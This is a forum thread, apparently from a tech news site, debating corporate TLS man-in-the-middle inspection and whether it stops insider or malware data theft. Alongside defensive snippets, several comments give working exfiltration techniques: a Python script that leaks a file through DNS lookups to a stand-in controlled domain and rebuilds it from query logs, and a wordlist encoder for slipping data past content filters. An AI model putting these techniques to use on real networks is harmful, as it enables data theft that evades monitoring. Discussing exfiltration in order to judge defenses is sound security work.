Without an SSL MITM, Intrusion Detection Systems (IDSes) are much less effective.
If you're using your company's network, then they have every right to monitor all of the activity on it. They're trying to protect trade secrets, future plans, customer data, employee records, etc. from attackers who would use that information to do harm to the company, its customers, and its employees. If you don't want your employer to know what you're doing, then don't use the company computer or company network to do it. And while you may think that you're too tech-savvy to fall prey to malware: 1) not everyone at your company is, and 2) no amount of savvy will protect you from all malware, especially malware that gains a foothold through an unpatched exploit. And there's also that whole other can of worms: malicious employees.
I think this SSL MITM thing has gone way too far. When an exec asks an engineer if it's possible to monitor all internet communication that goes in and out of the company network, including communication that is encrypted by TLS, the correct answer is no. In fact, this specific thing is what TLS is designed to prevent, and new implementations of the protocol are only going to get better at preventing it. The exec will only get the answer they want if they pressure the engineer, or if the engineer is trying to sell them something (like a MITM proxy). Then the engineer will admit that it's possible to snoop on some TLS connections if you do awful things like installing fake certificates on company laptops. They may or may not mention that if they do it wrong it will degrade the security of everything on the network. God forbid the computers at a bank should be less secure than the computers in the average household because a MITM proxy is silently downgrading the security of all the TLS connections that travel through it.
Now, because engineers are so bad at saying 'no' to the people who want SSL MITM, it's apparently become a regulatory requirement. SSL MITM might let you passively surveil your employees' Facebook Messenger conversations, but it still doesn't protect you against a malicious employee who is tech-savvy (or malware written by people who have SSL MITM proxies in mind). They could just put the information they want to smuggle out of the network into an encrypted .zip. They could even do something creative like using steganography to hide it in family photos that they upload to Facebook. The only real solution to this is to lock down the devices that people use to access the network, not the network itself.
>In fact, this specific thing is what TLS is designed to prevent, and new implementations of the protocol are only going to get better at preventing it.
This isn't true. The TLS protocol is not a philosophy; it does not have an opinion on who you should trust as a root certificate authority. If you trust a particular root, it is wholly within the design of TLS to allow connections that are monitored by whoever controls that root authority. Who is trusted is up to you.
>They may or may not mention that if they do it wrong it will degrade the security of everything on the network.
Right, that's why you don't do it wrong. This same argument applies for any monitoring technology, like cameras. An insecure camera system actually helps a would-be intruder by giving them valuable information. So if you install cameras, you'd better do it right.
As for your list of ways such a system could be circumvented, I don't understand the logic of it. So because there are ways around a security measure, you shouldn't use the security measure at all? There is no security panacea, just a wide range of imperfect measures to be deployed based on your threat model and resources. And luckily, most bad guys are pretty incompetent. But to address some examples you give, and show how not all is lost:
- A large encrypted zip file is sent out of the network. Depending on what your concerns are, that could be a red flag and warrant further analysis of that machine's/user's activity (a rough sketch of one way to flag such uploads follows this list).
- Software trying to circumvent your firewall/IDS is definitely a red flag. You might even block such detected attempts by default, and just maintain a whitelist for traffic that should be allowed regardless (e.g. for approved apps that use pinned certificates for updates).
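For illustration, the kind of "looks encrypted" heuristic I have in mind is just a size-plus-Shannon-entropy check on the outbound payload. A minimal sketch in Python; the threshold, size cutoff, and function names are my own illustration, not any particular IDS product's API:

    import math
    from collections import Counter

    def shannon_entropy(data: bytes) -> float:
        """Bits of entropy per byte; encrypted or well-compressed data approaches 8.0."""
        if not data:
            return 0.0
        total = len(data)
        counts = Counter(data)
        return -sum((c / total) * math.log2(c / total) for c in counts.values())

    def flag_outbound_payload(payload: bytes, min_size: int = 1_000_000, threshold: float = 7.5) -> bool:
        """Flag large, high-entropy uploads (e.g. encrypted zips) for human review."""
        return len(payload) >= min_size and shannon_entropy(payload) > threshold

Expect plenty of false positives (compressed media also looks random), which is why this should be a flag for review rather than an automatic block.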
> > In fact, this specific thing is what TLS is designed to prevent, and new implementations of the protocol are only going to get better at preventing it.
> This isn't true. The TLS protocol is not a philosophy; [...]
Well, the TLS specification [1] says, as the first sentence of its introduction: "The primary goal of the TLS protocol is to provide privacy and data integrity between two communicating applications."
I think that if something is "the primary goal of the TLS protocol", it can fairly be said that TLS is designed to do it.
> This isn't true. The TLS protocol is not a philosophy; it does not have an opinion on who you should trust as a root certificate authority. If you trust a particular root, it is wholly within the design of TLS to allow connections that are monitored by whoever controls that root authority. Who is trusted is up to you.
Like the sibling comment said, this goes against the wording of the TLS specification, but I also think this is looking at the issue from the wrong perspective: from the perspective of the network admin rather than the user. The user does not trust the MITM proxy's fake root. Let's say you set up a corporate network and rather than just whitelisting the external IPs you trust, you give your users the freedom to browse the internet but you pipe everything through a BlueCoat proxy. Your users will take advantage of this freedom to do things like, say, checking their bank balance. When the user connects to the banking website, they will initialize a TLS session, the purpose of which is to keep their communication with their bank confidential. The user will assume their communication is confidential because of the green padlock in their address bar and the bank will assume their communication is confidential because it is happening over TLS. TLS MITM violates these assumptions. If the bank knew that a third party could see the plaintext of the communication, they probably would not allow the connection. If I ran a high-security website, I'd probably look for clues like the X-BlueCoat-Via HTTP header and just drop the connection if I found any.
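For what it's worth, that server-side check is only a few lines. A minimal sketch using Flask purely for illustration; X-BlueCoat-Via is the header mentioned above, and other interception products add their own fingerprints:

    from flask import Flask, request, abort

    app = Flask(__name__)

    # Request headers that interception proxies are known to add to forwarded
    # traffic. X-BlueCoat-Via is just the example from above; extend as needed.
    INTERCEPTION_HINTS = ("X-BlueCoat-Via",)

    @app.before_request
    def refuse_visibly_intercepted_clients():
        # If the request carries a proxy's fingerprint, the TLS session was
        # terminated by a middlebox somewhere along the way, so refuse to serve it.
        if any(h in request.headers for h in INTERCEPTION_HINTS):
            abort(403)

Of course this only catches proxies polite enough to announce themselves; a quiet one leaves no header at all.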
> As for your list of ways such a system could be circumvented, I don't understand the logic of it. So because there are ways around a security measure, you shouldn't use the security measure at all?
In some cases, yeah. There are a lot of security measures out there that are just implemented to tick some boxes and don't provide much practical value. If they don't provide much value, but they actively interfere with real security measures (for example, by delaying the rollout of TLS 1.3), or they're just another point of failure and additional attack surface (bad proxies can leak confidential data; cf. Cloudflare), they should be removed. I'll admit most bad guys are incompetent, but it's dangerous to assume they all are, because that gives the competent ones a lot of power, and someone who is competent enough to know that a network uses a TLS MITM proxy will just add another layer of encryption. (Or, like some other comments are suggesting, they'll just test your physical security instead and try to take the data out on a flash drive.)
> still doesn't protect you against (...) malware written by people who have SSL MITM proxies in mind
Exactly this is what I don't get. Since these abominations are becoming ubiquitous, surely malware writers are starting to work on workarounds? And in this case, it's as easy as setting up an SSH tunnel and running your malware traffic through that, which is a few days of work at most for a massive ROI?
Not even malware writers: in the recent Cloudflare incident, there was one password manager that was affected, but the leak was harmless for them because the content within their TLS connections had another layer of encryption. Both MITM proxies and their TLS-terminating CDN can see only ciphertext.
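That pattern is simple to sketch: encrypt at the application layer with a key the middleboxes never see, and let TLS carry nothing but ciphertext. A rough illustration in Python using the cryptography package; the URL and payload here are made up:

    import requests
    from cryptography.fernet import Fernet

    # Key agreed out of band between client and server (e.g. derived from the
    # user's master password); no proxy or CDN on the path ever sees it.
    key = Fernet.generate_key()
    f = Fernet(key)

    ciphertext = f.encrypt(b'{"site": "example.com", "password": "hunter2"}')

    # Even if the TLS layer is terminated by a MITM proxy or a CDN, all it can
    # log or leak is the Fernet ciphertext.
    requests.post("https://vault.example.com/api/blob", data=ciphertext, timeout=10)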
In which case your malware can do DNS lookups against a suitable domain: just chop your file into suitably sized chunks, encode them as valid hostnames, and look up [chunk of file].evilmalwaredomain.com; soon enough the server handling evilmalwaredomain.com will have the whole file.
Or plain HTTP POSTs with encrypted content. If the proxy rejects anything that looks encrypted, use plain HTTP POSTs that encode the binary against a wordlist and post the result as nonsensical rants to a suitable user-created sub-reddit (a toy version of that encoding is sketched below).
Or e-mails made using the same mechanism.
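A toy version of that bytes-to-words encoding, just to show how little it takes; the wordlist here is a placeholder, and a real one would use ordinary English words so the output reads like (bad) prose:

    # 256 distinct words, one per byte value. A real list would be common
    # English words; "word0" .. "word255" are stand-ins for the sketch.
    WORDS = [f"word{i}" for i in range(256)]
    INDEX = {w: i for i, w in enumerate(WORDS)}

    def encode(data: bytes) -> str:
        """Turn an arbitrary binary blob into a stream of 'words'."""
        return " ".join(WORDS[b] for b in data)

    def decode(text: str) -> bytes:
        """Recover the original bytes from the word stream."""
        return bytes(INDEX[w] for w in text.split())

With a decent wordlist, the output sails past any filter that is only looking for high-entropy or binary content.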
If you want low-latency two-way communication, doing this can be a bit hard, but you basically have no way of stopping even a generic way of passing data out unless you whitelist only a tiny set of trusted sites and reject all other network traffic (such as DNS lookups). And keep in mind you can't just lock down client traffic out of the network - you would also need to lock down your servers and filter things like DNS - the above-mentioned DNS approach will work even through intermediary recursive resolvers (malware-infected desktop => trusted corporate recursive resolver => internet), unless they filter out requests for domains they don't trust.
But basically, if you allow data out, it's almost trivial to find ways to pass data out unless the channel is extremely locked down.
Totally agreed they have the right to monitor your network traffic, but I still think in most cases employees should try to push back on this.
At least from my view, it's not so much that I don't want my company to know what I'm doing, as that I don't trust their software to securely MITM all of my traffic. This thread doesn't fill me with confidence about the competency of these corporate MITM proxies. And the recent Cloudflare news doesn't help either -- they're effectively the world's largest MITM proxy, and even they couldn't avoid leaking a huge amount of "secure" traffic.
There are surely sectors where it's necessary for a company to MITM all traffic, but I think most companies will do better security-wise by not messing with TLS. It's just too hard to get right.
At my workplace, where we have to do TLS inspection for regulatory purposes, we provide an internet-only wifi network for employee personal use where we don't intercept TLS. This network is fully isolated from the corporate network, and corporate devices join a different, more heavily monitored network. I believe this strikes the best balance between regulatory compliance and employee privacy. People can still use personal email or do online banking while at the office without inspection, but no corporate data can be moved en masse off company servers.
When connecting a corporate device to any non-corporate network (including the employee wifi), you can't go anywhere until the VPN is connected. The VPN routes you through all the same inspection points as being on premises.
And how can your inspection points verify that data isn't being exfiltrated? Arbitrary pipes can be made over SSH, over DNS, and I don't really consider these advanced. How do you handle techniques like chaffing and winnowing, steganography, or someone who knows how to transmit an arbitrary number of bits using only two bits?
DNS is my favourite hack in that respect because so few people are aware of it.
For those who don't know, there are even full IP proxies that use DNS [1], but you can hack up a primitive one using a shell script: set up a nameserver for a domain, turn on full query logging, and have a script split your file up, encode it into valid DNS labels, and request [some encoded segment].[yourdomain]. Now your file will be sitting in pieces in your DNS query log, and all you need is a simple script to re-assemble it.
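Roughly, the two halves of that hack look like this, sketched in Python rather than shell; the domain, the [seq]-[base32] label format, and the query-log parsing are all assumptions, and a real log's layout depends on your nameserver:

    import base64
    import re
    import socket

    DOMAIN = "yourdomain.example"  # a domain whose authoritative nameserver you control

    def send(data: bytes, chunk_size: int = 30) -> None:
        """Client side: split the file, base32-encode each chunk into a DNS label,
        and look it up. NXDOMAIN answers are fine; the query still reaches (and is
        logged by) the authoritative server, even via intermediary resolvers.
        chunk_size=30 keeps each label under DNS's 63-character limit."""
        for seq, i in enumerate(range(0, len(data), chunk_size)):
            label = base64.b32encode(data[i:i + chunk_size]).decode().rstrip("=").lower()
            try:
                socket.gethostbyname(f"{seq}-{label}.{DOMAIN}")
            except socket.gaierror:
                pass

    def reassemble(query_log_path: str) -> bytes:
        """Server side: pull the labels back out of the query log and reorder them."""
        pattern = re.compile(r"(\d+)-([a-z2-7]+)\." + re.escape(DOMAIN))
        chunks = {}
        with open(query_log_path) as log:
            for line in log:
                m = pattern.search(line)
                if m:
                    label = m.group(2).upper()
                    label += "=" * (-len(label) % 8)  # restore base32 padding
                    chunks[int(m.group(1))] = base64.b32decode(label)
        return b"".join(chunks[i] for i in sorted(chunks))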
Best of all is that it works even if it passes through intermediary DNS servers, such as a corporate proxy, unless it's heavily filtered (e.g. whitelisting domains) or too rate limited to be useful.
The VPN clients offer a "hotspot login" or similar feature so that you can open up that access. It doesn't work for anything else; it only opens enough access to bring the VPN up so that your company computer can connect to the company network.
That obvious workaround doesn't give you a 24/7 hole from the Internet. To copy information, you need a person to knowingly do it. This decreases the attack surface tremendously.
> If you're using your company's network, then they have every right to monitor all of the activity on it.
It isn't a question of whether they're allowed to do it, it's a question of whether they should do it.
It's ineffective against insider exfiltration of data unless you're also doing body cavity searches for USB sticks, and if you're at that point then the sensitive network should not be connected to the internet at all.
And it's similarly ineffective against malware because TLS is not the only form of encryption. What difference does it make if someone uploads a file using opaque TLS vs. uploading an opaque encrypted file using MITM'd TLS? Banning encrypted files, even if you could actually detect them, doesn't work because they're often required for regulatory compliance.
It isn't worth the security cost. The situation in the article is bad enough, but consider what happens if the MITM appliance itself gets compromised, when it holds a root private key trusted by all your devices and has read and modify access to all the traffic.
> It's ineffective against insider exfiltration of data unless you're also doing body cavity searches for USB sticks ...
I dunno. I know plenty of people who might want to work on an Excel spreadsheet at home over the weekend and so might e-mail it to their personal e-mail account. They would almost certainly reconsider, however, if it required copying that spreadsheet to a flash drive that they then had to hide in their ass.
In that case, it sounds like the device is effective after all.
It depends how much the data is worth. That's really the problem.
Suppose you're a college dorm network. Then you can't justify TLS MITM because the risk of your MITM device actively creating a security hole that leads to all the students' bank passwords being stolen is greater than any benefit from centrally monitoring the traffic in that environment.
Suppose you're a highly classified government research lab. Then you can't justify TLS MITM because the bad guys are skilled foreign government agents and you need to isolate the network from the internet.
And there is no happy medium because the risk and cost of having all your TLS-secured data compromised scales with the target value. The higher the target value the higher the risk created by the MITM proxy, all the way up to the point that you can justify isolating the network from the internet.
>It's ineffective against insider exfiltration of data unless you're also doing body cavity searches for USB sticks, and if you're at that point then the sensitive network should not be connected to the internet at all.
We opted to disable usb mass storage since cavity searches seemed a little much
> We opted to disable usb mass storage since cavity searches seemed a little much
This is missing the point. Someone could plug a SATA drive directly into the motherboard, or otherwise compromise their work computer to disable the restrictions, or take pictures of documents with a camera, or bring their own computer on-site, or bring a line-of-sight wireless network device on-site, or send the data over the internet as an encrypted file or via ssh or using steganography, and so on.
The point is that preventing data exfiltration is not a trivial task, and if you're at all serious about it then the network containing the secrets is not connected to the internet. And if it's less serious than that then it can't justify a high-risk TLS MITM device.
And the A-Team could land on the roof with a helicopter in the middle of the night, take control of the building, breach the data center, and physically steal and leave with all the servers.
Yes, if one is determined enough, they will find a way to steal data.
> It isn't worth the security cost.
That's up to the company to decide... and apparently they have decided that it is worth the cost, regardless of what zrm, random person on the Internet, thinks.
Bad generalization - in many countries, it's illegal for your company to do content inspection.
There's a good argument that it's unethical too. There are many areas where your company has to trust you rather than pervasively monitor your doings and communications, and this should fall into the same category.
Put it on the endpoint. You already need protection on the endpoint to guard against malware, etc., and network MITM solutions only cover assets on the internal network. What about company laptops?
Pretty much all the endpoint solutions MITM exactly the same way as the middlebox, by running as a proxy listening on localhost. They also pretty much universally do an even worse job than the network middleboxes at handling invalid certs and supporting modern TLS, hard as that may be to believe. Then you have the added nightmare of ensuring a client on tens or hundreds of thousands of endpoints is fully patched and functioning correctly.
Most of the solutions I have seen for devices outside the corporate perimeter are some combination of enforced vpn and authenticated proxy that is internet accessible.
Endpoint-based MITM solutions tend to be even worse for security, since they have a larger attack surface (and generally seem to be really badly implemented). On the plus side, some things can be done locally without MITM.
From a privacy perspective, it doesn't really matter whether the monitoring happens centrally or not.
In the cases where I've seen strict filtering laptops were forced through VPN connections to HQ, where the gateway then decides what parts of internal and external networks they are allowed to access.
I agree that this is how they see it, but it's a losing battle. There's no filter for people's minds, or for what they write down. The owner of a company cannot approach this problem from the perspective of technical bandaids; they absolutely must trust the right people, and only the right people.
> If you're using your company's network, then they have every right to monitor all of the activity on it.
This is tantamount to steaming open and resealing the envelopes of all physical mail. Have some goddamn ethics; I'd sooner quit than snoop traffic in this manner.
If the use of the MITM is disclosed, it is more like requiring you to leave outbound paper mail in an outbox without an envelope, and having the internal mail office archive it and add the envelope. Perfectly reasonable.
What you do while at work should not be personal in the first place, and thus it cannot really be snooped upon.
If you need to send a personal paper letter, you would go to the post office, not send it using the company's stamps, right?
All MITM proxies I know of require an enterprise CA trusted by the endpoint. If that CA is on your machine, the endpoint is probably owned by your employer. It is legal in most jurisdictions for your employer to monitor the usage of resources they have provided, be it a computer or a network.
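As an aside, it's easy to see from a corporate machine which CA a given connection actually chains to. A minimal sketch; the host is just an example, and on an inspected connection the issuer printed will be the enterprise CA rather than the public CA the site really uses:

    import socket
    import ssl

    def issuer_of(host: str, port: int = 443) -> str:
        """Return the issuer of the certificate presented for host:port."""
        ctx = ssl.create_default_context()  # uses the machine's trust store
        with socket.create_connection((host, port), timeout=10) as sock:
            with ctx.wrap_socket(sock, server_hostname=host) as tls:
                issuer = dict(rdn[0] for rdn in tls.getpeercert()["issuer"])
                return issuer.get("organizationName", issuer.get("commonName", "?"))

    print(issuer_of("www.example.com"))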
I would never trust a company device, or company network, with anything I consider sensitive. Use your own device and keep it on cellular.
Also, though I don't like it, employers in the US do have the right to open mail addressed to you personally if it is delivered to the office.
Legal and ethical aren't the same thing, though. I agree it's legal for your employer to monitor traffic on their network. But an ethical sysadmin would not facilitate their doing so (unless there were a fairly significant and unusual justification in context).
(Note: I would also never trust a company device or company network, and I keep my personal devices completely separate from the company network for this reason. But I consider this a workaround for a deplorable situation, rather than just the way things are.)
Personally I think that is too simplistic a position and the reality is more complex. Most people would agree that using this approach to spy on your employees by tracking their banking activity is unethical. Using MITM-SSL as a way to get visibility into certain APTs using products such as FireEye is controversial, but I don't personally believe it to be unethical.
I would argue against such an approach if there are alternatives but if the organization's leaders were set on it I would engage with the process and make sure that it did not evolve into more unethical practices such as logging all traffic contents or the above banking example.
What law in the US makes it illegal to circumvent an encryption system? I can think of the DMCA's prohibitions against circumvention measures for DRM, but that's specific to protecting copyrighted works.
This FindLaw article http://employment.findlaw.com/workplace-privacy/privacy-in-t... agrees that employers have a right to monitor communications from their devices on their networks, especially when this policy has been clearly laid out and agreed to by employees. Expectation of privacy is a major deciding factor in US law.
I'm not sure of the legality of an ISP doing this. I would hope it's illegal, but ISPs are weirdly regulated compared to, say, phone companies.